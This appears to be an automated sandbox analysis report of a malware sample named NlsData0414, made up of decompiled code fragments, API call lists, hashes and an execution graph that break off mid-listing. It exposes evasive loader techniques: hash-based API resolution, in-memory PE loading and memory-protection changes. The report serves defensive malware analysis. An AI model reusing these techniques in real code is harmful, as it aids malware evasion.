                                                        0x00000000
                                                        0x002b83bd
                                                        0x002b833f
                                                        0x002b8344
                                                        0x002b8365
                                                        0x00000000
                                                        0x002b8346
                                                        0x002b834b
                                                        0x002b83c7
                                                        0x002b83ce
                                                        0x002b83e1
                                                        0x002b83e6
                                                        0x002b83e6
                                                        0x002b83ec
                                                        0x002b83f1
                                                        0x002b83fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x002b834b
                                                        0x002b8344
                                                        0x00000000
                                                        0x002b834d
                                                        0x002b834d
                                                        0x002b8364
                                                        0x00000000
                                                        0x002b8364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 002B83B4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: bde53fb48a132d7b363c4a9eb7aed09f258c44f55a3a0fab698ecbf8401d50bf
                                                        • Instruction ID: 6d1d9c9dc99b53f16146ddcd3d2a105fb6a26c796897cb14599d975d39589db7
                                                        • Opcode Fuzzy Hash: bde53fb48a132d7b363c4a9eb7aed09f258c44f55a3a0fab698ecbf8401d50bf
                                                        • Instruction Fuzzy Hash: F081CC70A283018FD718DF68D8946ABB7E9AB94788F00492EF589C7291EB74DD11CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E002B7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E002B34C0(__ecx);
                                                        				if( *0x2bdd1c == 0) {
                                                        					 *0x2bdd1c = E002B3E60(__ebx, E002B3F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x2be548; // 0x5f7ed8
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x2be494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E002B3E60(_t15, E002B3F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x2be494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x2bdf30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E002B3E60(_t15, E002B3F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x2bdf30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x002b7080
                                                        0x002b7082
                                                        0x002b7089
                                                        0x002b7092
                                                        0x002b70aa
                                                        0x002b70aa
                                                        0x002b70b0
                                                        0x002b70b2
                                                        0x002b70b8
                                                        0x002b70bc
                                                        0x002b70c3
                                                        0x002b70d6
                                                        0x002b70db
                                                        0x002b70db
                                                        0x002b70e2
                                                        0x002b70e4
                                                        0x002b70eb
                                                        0x002b70fe
                                                        0x002b7103
                                                        0x002b7103
                                                        0x002b7110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002B721D,002B68AC), ref: 002B70B0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 3136d635a4dac826b788cb637293627b95e58d02f1f90ac6824aba1d67827b8c
                                                        • Instruction ID: 3ca2fdc5014f60e5439a28da2a21a9b498dd703f7020ea240181f26f7eeb77a3
                                                        • Opcode Fuzzy Hash: 3136d635a4dac826b788cb637293627b95e58d02f1f90ac6824aba1d67827b8c
                                                        • Instruction Fuzzy Hash: BC018F307342110B9B14EF79A8546FA2AABAFE07D8710452AE019DB216FA34DD218B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002A0F08
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002A0F3E
                                                          • Part of subcall function 002A0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002A0F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002A02F6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: 0d473b8d8cdb3586a8a300671cc5b905f1d5941b0bc9f44fdc4ef40eb1809c5d
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: D35139B1910268EBDB20EF64DD84BDEB778EF89700F0045DAE509B7250DB746A85CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: aab6d02d08a449c4ae51ee4df0ec47e2fb455a139ccf11bd20e5884bc64a6daa
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 16313D78E511289BCB04DB98CD80AEDBBB5FF5C340B508027D506737A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 1659e77f6d5dd6c45b3990c4635430bd48d2df9fb7b6ce9363d19fcc7d482112
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 1051A7B1A243015FD720DF26C881B5BB3D89FD67A4F04452EF948E7241EA39D9348B96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275450114.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2a0000_NlsData0414.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: b9692bd40909d17af691689a3bd7471df2335f7600a87481369afab99e82fa69
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: B4414AB56343025FC314DE69CC85BABB2D8ABC6B50F08883EF744D6241DA70D92887A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1171
                                                        Total number of Limit Nodes:13

                                                        Graph

                                                        execution_graph 5996 3e4b70 5997 3e4b98 5996->5997 5998 3e4b82 5996->5998 6001 3e4bd7 CreateProcessW 5997->6001 6003 3e3f00 GetPEB 5997->6003 5999 3e3f00 GetPEB 5998->5999 6000 3e4b8c 5999->6000 6002 3e3e60 GetPEB 6000->6002 6004 3e4bf7 6001->6004 6005 3e4c73 6001->6005 6002->5997 6006 3e4bc6 6003->6006 6007 3e4bff 6004->6007 6010 3e3f00 GetPEB 6004->6010 6011 3e4c33 6004->6011 6008 3e3e60 GetPEB 6006->6008 6009 3e4bd2 6008->6009 6009->6001 6012 3e4c27 6010->6012 6014 3e4c5d 6011->6014 6015 3e3f00 GetPEB 6011->6015 6013 3e3e60 GetPEB 6012->6013 6013->6011 6016 3e4c51 6015->6016 6017 3e3e60 GetPEB 6016->6017 6017->6014 6892 3e64b0 6893 3e64ba 6892->6893 6898 3e64d0 6892->6898 6894 3e3f00 GetPEB 6893->6894 6895 3e64c4 6894->6895 6896 3e3e60 GetPEB 6895->6896 6896->6898 6897 3e659a 6898->6897 6899 3e42c0 GetPEB 6898->6899 6900 3e657b 6899->6900 6900->6897 6902 3e4160 6900->6902 6903 3e4172 6902->6903 6907 3e4180 6902->6907 6904 3e3f00 GetPEB 6903->6904 6905 3e4177 6904->6905 6906 3e3e60 GetPEB 6905->6906 6906->6907 6907->6897 6914 3e7fb0 6915 3e34c0 GetPEB 6914->6915 6916 3e7fc2 6915->6916 6917 3e3f00 GetPEB 6916->6917 6919 3e7fe3 6916->6919 6918 3e7fd7 6917->6918 6920 3e3e60 GetPEB 6918->6920 6921 3e8029 6919->6921 6922 3e3f00 GetPEB 6919->6922 6920->6919 6924 3e8051 6921->6924 6926 3e3f00 GetPEB 6921->6926 6923 3e801d 6922->6923 6925 3e3e60 GetPEB 6923->6925 6929 3e807d 6924->6929 6930 3e3f00 GetPEB 6924->6930 6925->6921 6927 3e8045 6926->6927 6928 3e3e60 GetPEB 6927->6928 6928->6924 6931 3e8071 6930->6931 6932 3e3e60 GetPEB 6931->6932 6932->6929 6933 3e78b0 6943 3e7990 6933->6943 6934 3e34c0 GetPEB 6934->6943 6935 3e7c1e 6937 3e3f00 GetPEB 6935->6937 6938 3e7c3d 6935->6938 6936 3e7c05 6939 3e7c31 6937->6939 6940 3e3e60 GetPEB 6939->6940 6940->6938 6941 3e3f00 GetPEB 6941->6943 6942 3e3e60 GetPEB 6942->6943 6943->6934 6943->6935 6943->6936 6943->6941 6943->6942 7111 3e4df0 GetPEB 6944 3e1928 6953 3e191f 6944->6953 6945 3e1bc6 6946 3e35c0 GetPEB 6945->6946 6948 3e1bd0 6946->6948 6947 3e1ba4 6949 3e1bf1 6948->6949 6950 3e3f00 GetPEB 6948->6950 6956 3e3f00 GetPEB 6949->6956 6958 3e1c23 6949->6958 6951 3e1be5 6950->6951 6955 3e3e60 GetPEB 6951->6955 6952 3e4e30 GetPEB 6952->6953 6953->6945 6953->6947 6953->6952 6954 3e3f00 GetPEB 6953->6954 6964 3e35c0 GetPEB 6953->6964 6965 3e3e60 GetPEB 6953->6965 6954->6953 6955->6949 6957 3e1c17 6956->6957 6959 3e3e60 GetPEB 6957->6959 6960 3e1c4b 6958->6960 6961 3e3f00 GetPEB 6958->6961 6959->6958 6962 3e1c3f 6961->6962 6963 3e3e60 GetPEB 6962->6963 6963->6960 6964->6953 6965->6953 7112 3e4869 7120 3e4870 7112->7120 7113 3e496e 7114 3e492c 7113->7114 7115 3e3f00 GetPEB 7113->7115 7118 3e4981 7115->7118 7116 3e3e60 GetPEB 7116->7120 7117 3e3f00 GetPEB 7117->7120 7119 3e3e60 GetPEB 7118->7119 7119->7114 7120->7113 7120->7114 7120->7116 7120->7117 5818 2d0170 5819 2d01fb 5818->5819 5834 2d0ad0 5819->5834 5825 2d02c4 5871 2d06f0 5825->5871 5827 2d02d0 5888 2d08f0 5827->5888 5829 2d02dc 5906 2d0580 5829->5906 5831 2d02e8 5832 2d02ef VirtualFree 5831->5832 5833 2d02fb 5831->5833 5832->5833 5835 2d0b2f 5834->5835 5836 2d0bf0 VirtualAlloc 5835->5836 5837 2d02ab 5835->5837 5838 2d0c1c 5836->5838 5840 2d0d60 5837->5840 5838->5837 5839 2d0cdb VirtualAlloc 5838->5839 5839->5837 5841 2d0d94 5840->5841 5842 2d0da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 2d02b8 5842->5843 5847 2d0ddb 5842->5847 5850 2d0400 GetCurrentProcess 5843->5850 5845 2d0e0d RtlMoveMemory 5845->5847 5846 2d0e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 2d0e91 RtlFillMemory 5847->5848 5849 2d0e6a RtlMoveMemory 5847->5849 5914 2d1140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 2d1140 lstrcpynW 5850->5915 5852 2d0459 NtQueryInformationProcess 5853 2d046f 5852->5853 5857 2d04c5 5852->5857 5854 2d0484 GetProcessHeap HeapFree 5853->5854 5855 2d0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5855 5860 2d0575 5853->5860 5854->5855 5855->5853 5855->5857 5856 2d04e5 5916 2d1140 lstrcpynW 5856->5916 5857->5856 5921 2d1140 lstrcpynW 5857->5921 5861 2d04dc RtlMoveMemory 5861->5856 5862 2d04ef RtlMoveMemory 5917 2d1140 lstrcpynW 5862->5917 5864 2d0511 RtlMoveMemory 5918 2d1140 lstrcpynW 5864->5918 5866 2d0528 RtlMoveMemory 5919 2d1140 lstrcpynW 5866->5919 5868 2d053f RtlMoveMemory 5920 2d1140 lstrcpynW 5868->5920 5870 2d055a RtlMoveMemory 5870->5825 5872 2d0740 5871->5872 5874 2d0744 5872->5874 5922 2d0fb0 5872->5922 5874->5827 5875 2d0770 5875->5874 5878 2d07ff LoadLibraryA 5875->5878 5930 2d1140 lstrcpynW 5875->5930 5877 2d07b5 RtlMoveMemory 5877->5875 5879 2d08b9 5878->5879 5886 2d080f 5878->5886 5879->5827 5881 2d082d RtlMoveMemory 5881->5875 5881->5886 5882 2d0858 GetProcAddress 5882->5874 5882->5886 5884 2d0872 RtlMoveMemory 5933 2d1140 lstrcpynW 5884->5933 5886->5874 5886->5875 5886->5882 5887 2d0890 RtlMoveMemory 5886->5887 5931 2d1140 lstrcpynW 5886->5931 5932 2d1140 lstrcpynW 5886->5932 5887->5874 5887->5886 5889 2d0934 5888->5889 5890 2d0fb0 2 API calls 5889->5890 5891 2d0938 5889->5891 5892 2d0970 5890->5892 5891->5829 5892->5891 5936 2d1140 lstrcpynW 5892->5936 5894 2d09af RtlMoveMemory 5894->5891 5900 2d09c2 5894->5900 5897 2d09f6 RtlMoveMemory 5897->5900 5898 2d0a97 RtlMoveMemory 5899 2d0aac 5898->5899 5898->5900 5899->5829 5900->5891 5937 2d1140 lstrcpynW 5900->5937 5938 2d1140 lstrcpynW 5900->5938 5940 2d1140 lstrcpynW 5900->5940 5902 2d0a3e RtlMoveMemory 5902->5891 5903 2d0a57 5902->5903 5939 2d1140 lstrcpynW 5903->5939 5905 2d0a61 RtlMoveMemory 5905->5900 5910 2d05bc 5906->5910 5907 2d05c0 5907->5831 5909 2d0617 RtlMoveMemory 5909->5910 5910->5907 5912 2d069b VirtualProtect 5910->5912 5941 2d1140 lstrcpynW 5910->5941 5942 2d1140 lstrcpynW 5910->5942 5912->5910 5913 2d06c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 2d0fda 5922->5924 5923 2d104a 5923->5875 5924->5923 5934 2d1140 lstrcpynW 5924->5934 5926 2d1001 5935 2d1140 lstrcpynW 5926->5935 5928 2d101b RtlMoveMemory 5929 2d1029 5928->5929 5929->5875 5930->5877 5931->5881 5932->5884 5933->5886 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5898 5941->5909 5942->5910 5943 3e30a0 5944 3e30ba 5943->5944 5945 3e3238 5944->5945 5946 3e32ab 5944->5946 5949 3e3291 RtlAllocateHeap 5944->5949 5950 3e3f00 GetPEB 5944->5950 5952 3e3e60 GetPEB 5944->5952 5946->5945 5953 3e3f00 GetPEB 5946->5953 5949->5944 5949->5945 5950->5944 5952->5944 5954 3e32bf 5953->5954 5955 3e3e60 5954->5955 5956 3e3ebc 5955->5956 5957 3e3e9c 5955->5957 5956->5945 5957->5956 5958 3e3f00 GetPEB 5957->5958 5961 3e40f5 5957->5961 5959 3e40e9 5958->5959 5960 3e3e60 GetPEB 5959->5960 5960->5961 5962 3e3f00 GetPEB 5961->5962 5968 3e4126 5961->5968 5964 3e411a 5962->5964 5963 3e3e60 GetPEB 5966 3e4157 5963->5966 5967 3e3e60 GetPEB 5964->5967 5965 3e4138 5965->5945 5966->5945 5967->5968 5968->5963 5968->5965 6018 3e5ce0 6026 3e65e0 6018->6026 6020 3e5ce5 6021 3e5d09 ExitProcess 6020->6021 6022 3e3f00 GetPEB 6020->6022 6023 3e5cf8 6022->6023 6024 3e3e60 GetPEB 6023->6024 6025 3e5d04 6024->6025 6025->6021 6070 3e65fd 6026->6070 6028 3e6dcd 6345 3eb2e0 6028->6345 6031 3e706e 6370 3e8740 6031->6370 6033 3e68df 6033->6020 6038 3e7061 6361 3e8d40 6038->6361 6043 3e3f00 GetPEB 6043->6070 6044 3e7073 6044->6020 6047 3e6f27 GetTickCount 6047->6070 6051 3e4220 GetPEB 6051->6070 6052 3e7066 6052->6020 6055 3e3e60 GetPEB 6060 3e6927 6055->6060 6059 3e3f00 GetPEB 6059->6060 6060->6047 6060->6055 6060->6059 6065 3e6975 GetTickCount 6060->6065 6064 3e3e60 GetPEB 6064->6070 6065->6070 6070->6028 6070->6031 6070->6033 6070->6038 6070->6043 6070->6051 6070->6060 6070->6064 6071 3e4160 GetPEB 6070->6071 6072 3e8400 6070->6072 6078 3e7120 6070->6078 6099 3e8e80 6070->6099 6109 3e8970 6070->6109 6121 3e80a0 6070->6121 6135 3e9860 6070->6135 6151 3e9620 6070->6151 6160 3e12b0 6070->6160 6182 3eafe0 6070->6182 6187 3e8700 6070->6187 6193 3e6060 6070->6193 6214 3eb430 6070->6214 6221 3e9f30 6070->6221 6230 3e61e0 6070->6230 6242 3e94d0 6070->6242 6249 3e3310 6070->6249 6259 3e1840 6070->6259 6274 3e3460 6070->6274 6284 3e53d0 6070->6284 6289 3e9270 6070->6289 6299 3e8bb0 6070->6299 6309 3e72d0 6070->6309 6319 3e9050 6070->6319 6333 3e4770 6070->6333 6350 3eb1d0 6070->6350 6355 3e7410 6070->6355 6071->6070 6075 3e84e3 6072->6075 6073 3e85bd 6073->6070 6074 3e8600 CreateFileW 6074->6073 6074->6075 6075->6073 6075->6074 6076 3e3f00 GetPEB 6075->6076 6077 3e3e60 GetPEB 6075->6077 6076->6075 6077->6075 6079 3e7125 6078->6079 6080 3e7233 6079->6080 6082 3e7232 6079->6082 6083 3e7080 GetPEB LoadLibraryW 6079->6083 6388 3e34c0 6080->6388 6082->6070 6083->6079 6085 3e7265 LoadLibraryW 6087 3e727a 6085->6087 6088 3e7290 6085->6088 6086 3e3f00 GetPEB 6089 3e7254 6086->6089 6090 3e3f00 GetPEB 6087->6090 6093 3e72b8 6088->6093 6096 3e3f00 GetPEB 6088->6096 6091 3e3e60 GetPEB 6089->6091 6092 3e7284 6090->6092 6094 3e7260 6091->6094 6095 3e3e60 GetPEB 6092->6095 6093->6070 6094->6085 6095->6088 6097 3e72ac 6096->6097 6098 3e3e60 GetPEB 6097->6098 6098->6093 6108 3e8ea0 6099->6108 6100 3e901b 6102 3e8fc6 6100->6102 6103 3e3f00 GetPEB 6100->6103 6101 3e8ff2 OpenServiceW 6101->6108 6102->6070 6105 3e902e 6103->6105 6104 3e3f00 GetPEB 6104->6108 6106 3e3e60 GetPEB 6105->6106 6106->6102 6107 3e3e60 GetPEB 6107->6108 6108->6100 6108->6101 6108->6102 6108->6104 6108->6107 6119 3e8991 6109->6119 6110 3e34c0 GetPEB 6110->6119 6111 3e8b74 6114 3e8add 6111->6114 6115 3e3f00 GetPEB 6111->6115 6113 3e3f00 GetPEB 6113->6119 6114->6070 6117 3e8b87 6115->6117 6116 3e3e60 GetPEB 6116->6119 6118 3e3e60 GetPEB 6117->6118 6118->6114 6119->6110 6119->6111 6119->6113 6119->6114 6119->6116 6120 3e3460 GetPEB 6119->6120 6398 3e5040 6119->6398 6120->6119 6133 3e8163 6121->6133 6122 3e34c0 GetPEB 6122->6133 6123 3e8397 CreateFileW 6124 3e83ee 6123->6124 6123->6133 6124->6070 6125 3e83c7 6126 3e83eb CloseHandle 6125->6126 6128 3e3f00 GetPEB 6125->6128 6126->6124 6127 3e8358 6127->6070 6129 3e83da 6128->6129 6130 3e3e60 GetPEB 6129->6130 6131 3e83e6 6130->6131 6131->6126 6132 3e3f00 GetPEB 6132->6133 6133->6122 6133->6123 6133->6125 6133->6127 6133->6132 6134 3e3e60 GetPEB 6133->6134 6134->6133 6150 3e9880 6135->6150 6136 3e9b02 6138 3e9b26 SHGetFolderPathW 6136->6138 6141 3e3f00 GetPEB 6136->6141 6137 3e99b2 OpenSCManagerW 6137->6150 6423 3e3040 6138->6423 6139 3e3f00 GetPEB 6139->6150 6140 3e9969 SHGetFolderPathW 6140->6150 6145 3e9b15 6141->6145 6142 3e9a66 CloseServiceHandle 6142->6150 6147 3e3e60 GetPEB 6145->6147 6146 3e9af5 6146->6070 6148 3e9b21 6147->6148 6148->6138 6149 3e3e60 GetPEB 6149->6150 6150->6136 6150->6137 6150->6139 6150->6140 6150->6142 6150->6146 6150->6149 6428 3e7c60 6150->6428 6159 3e9630 6151->6159 6152 3e9829 6452 3e3780 6152->6452 6153 3e34c0 GetPEB 6153->6159 6154 3e981f 6154->6070 6156 3e9839 6156->6070 6157 3e3f00 GetPEB 6157->6159 6158 3e3e60 GetPEB 6158->6159 6159->6152 6159->6153 6159->6154 6159->6157 6159->6158 6179 3e12e1 6160->6179 6162 3e181c 6581 3e4220 6162->6581 6164 3e17d1 6164->6070 6166 3e1823 6166->6070 6167 3e34c0 GetPEB 6167->6179 6168 3e42c0 GetPEB 6168->6179 6173 3e3f00 GetPEB 6173->6179 6174 3e4220 GetPEB 6174->6179 6175 3e1641 _snwprintf 6177 3e3460 GetPEB 6175->6177 6177->6179 6179->6162 6179->6164 6179->6166 6179->6167 6179->6168 6179->6173 6179->6174 6179->6175 6180 3e3e60 GetPEB 6179->6180 6181 3e3460 GetPEB 6179->6181 6479 3e1fc0 6179->6479 6487 3e1e70 6179->6487 6496 3e5c00 6179->6496 6515 3e1c70 6179->6515 6531 3e2230 6179->6531 6539 3e2be0 6179->6539 6554 3e4ea0 6179->6554 6559 3e1900 6179->6559 6180->6179 6181->6179 6183 3eb101 6182->6183 6186 3eaff8 6182->6186 6183->6070 6184 3e3e60 GetPEB 6184->6186 6185 3e3f00 GetPEB 6185->6186 6186->6183 6186->6184 6186->6185 6188 3e8709 6187->6188 6189 3e871f 6187->6189 6190 3e3f00 GetPEB 6188->6190 6189->6070 6191 3e8713 6190->6191 6192 3e3e60 GetPEB 6191->6192 6192->6189 6623 3e5500 6193->6623 6195 3e613c 6197 3e35c0 GetPEB 6195->6197 6196 3e6134 6196->6070 6199 3e6147 6197->6199 6198 3e3f00 GetPEB 6202 3e6074 6198->6202 6201 3e6168 6199->6201 6203 3e3f00 GetPEB 6199->6203 6200 3e3e60 GetPEB 6200->6202 6206 3e61a2 6201->6206 6207 3e3f00 GetPEB 6201->6207 6202->6195 6202->6196 6202->6198 6202->6200 6204 3e615c 6203->6204 6205 3e3e60 GetPEB 6204->6205 6205->6201 6210 3e61ca 6206->6210 6211 3e3f00 GetPEB 6206->6211 6208 3e6196 6207->6208 6209 3e3e60 GetPEB 6208->6209 6209->6206 6210->6070 6212 3e61be 6211->6212 6213 3e3e60 GetPEB 6212->6213 6213->6210 6216 3eb440 6214->6216 6215 3eb4ba 6215->6070 6216->6215 6633 3eab50 6216->6633 6649 3ea170 6216->6649 6670 3ea7a0 6216->6670 6690 3ea5e0 6216->6690 6228 3e9f40 6221->6228 6222 3ea01b 6223 3e9f64 6222->6223 6225 3e3f00 GetPEB 6222->6225 6223->6070 6224 3e3f00 GetPEB 6224->6228 6226 3ea02e 6225->6226 6227 3e3e60 GetPEB 6226->6227 6227->6223 6228->6222 6228->6223 6228->6224 6229 3e3e60 GetPEB 6228->6229 6229->6228 6239 3e6202 6230->6239 6231 3e42c0 GetPEB 6231->6239 6233 3e624b 6233->6070 6235 3e3e60 GetPEB 6235->6239 6236 3e3f00 GetPEB 6236->6239 6237 3e6490 6237->6070 6238 3e3f00 GetPEB 6240 3e642d 6238->6240 6239->6231 6239->6233 6239->6235 6239->6236 6239->6240 6805 3e55b0 6239->6805 6814 3e4c80 6239->6814 6240->6237 6240->6238 6241 3e3e60 GetPEB 6240->6241 6241->6240 6247 3e94f0 6242->6247 6243 3e95c2 6243->6070 6245 3e3f00 GetPEB 6245->6247 6246 3e4c80 GetPEB 6246->6247 6247->6243 6247->6245 6247->6246 6248 3e3e60 GetPEB 6247->6248 6823 3e46c0 6247->6823 6248->6247 6250 3e334a 6249->6250 6251 3e336f 6250->6251 6252 3e3f00 GetPEB 6250->6252 6255 3e3f00 GetPEB 6251->6255 6258 3e3397 6251->6258 6253 3e3363 6252->6253 6254 3e3e60 GetPEB 6253->6254 6254->6251 6256 3e338b 6255->6256 6257 3e3e60 GetPEB 6256->6257 6257->6258 6258->6070 6260 3e184c 6259->6260 6261 3e1862 6259->6261 6262 3e3f00 GetPEB 6260->6262 6265 3e3f00 GetPEB 6261->6265 6269 3e188b 6261->6269 6263 3e1856 6262->6263 6264 3e3e60 GetPEB 6263->6264 6264->6261 6266 3e187f 6265->6266 6267 3e3e60 GetPEB 6266->6267 6267->6269 6268 3e18ee 6268->6070 6269->6268 6269->6269 6838 3e25e0 6269->6838 6271 3e18d8 6272 3e18dc 6271->6272 6273 3e4220 GetPEB 6271->6273 6272->6070 6273->6268 6275 3e346d 6274->6275 6278 3e3483 6274->6278 6276 3e3f00 GetPEB 6275->6276 6277 3e3477 6276->6277 6279 3e3e60 GetPEB 6277->6279 6280 3e3f00 GetPEB 6278->6280 6282 3e34ab 6278->6282 6279->6278 6281 3e349f 6280->6281 6283 3e3e60 GetPEB 6281->6283 6282->6070 6283->6282 6288 3e53e0 6284->6288 6285 3e3f00 GetPEB 6285->6288 6286 3e54b4 6286->6070 6287 3e3e60 GetPEB 6287->6288 6288->6285 6288->6286 6288->6287 6298 3e9290 6289->6298 6291 3e949c 6292 3e9410 6291->6292 6293 3e3f00 GetPEB 6291->6293 6292->6070 6294 3e94af 6293->6294 6295 3e3e60 GetPEB 6294->6295 6295->6292 6296 3e3f00 GetPEB 6296->6298 6297 3e3e60 GetPEB 6297->6298 6298->6291 6298->6292 6298->6296 6298->6297 6853 3e1000 6298->6853 6307 3e8bc4 6299->6307 6300 3e8d1d 6862 3e36b0 6300->6862 6301 3e3780 2 API calls 6301->6307 6303 3e8d10 6303->6070 6305 3e34c0 GetPEB 6305->6307 6306 3e3e60 GetPEB 6306->6307 6307->6300 6307->6301 6307->6303 6307->6305 6307->6306 6308 3e3f00 GetPEB 6307->6308 6308->6307 6310 3e72d9 6309->6310 6314 3e72ef 6309->6314 6311 3e3f00 GetPEB 6310->6311 6312 3e72e3 6311->6312 6313 3e3e60 GetPEB 6312->6313 6313->6314 6315 3e3f00 GetPEB 6314->6315 6316 3e7318 6314->6316 6317 3e730c 6315->6317 6316->6070 6318 3e3e60 GetPEB 6317->6318 6318->6316 6320 3e9070 6319->6320 6321 3e91de 6320->6321 6322 3e3f00 GetPEB 6320->6322 6323 3e91e4 6320->6323 6330 3e3e60 GetPEB 6320->6330 6321->6070 6322->6320 6324 3e921f 6323->6324 6325 3e3f00 GetPEB 6323->6325 6328 3e9247 6324->6328 6329 3e3f00 GetPEB 6324->6329 6326 3e9213 6325->6326 6327 3e3e60 GetPEB 6326->6327 6327->6324 6328->6070 6331 3e923b 6329->6331 6330->6320 6332 3e3e60 GetPEB 6331->6332 6332->6328 6334 3e4785 6333->6334 6335 3e479b 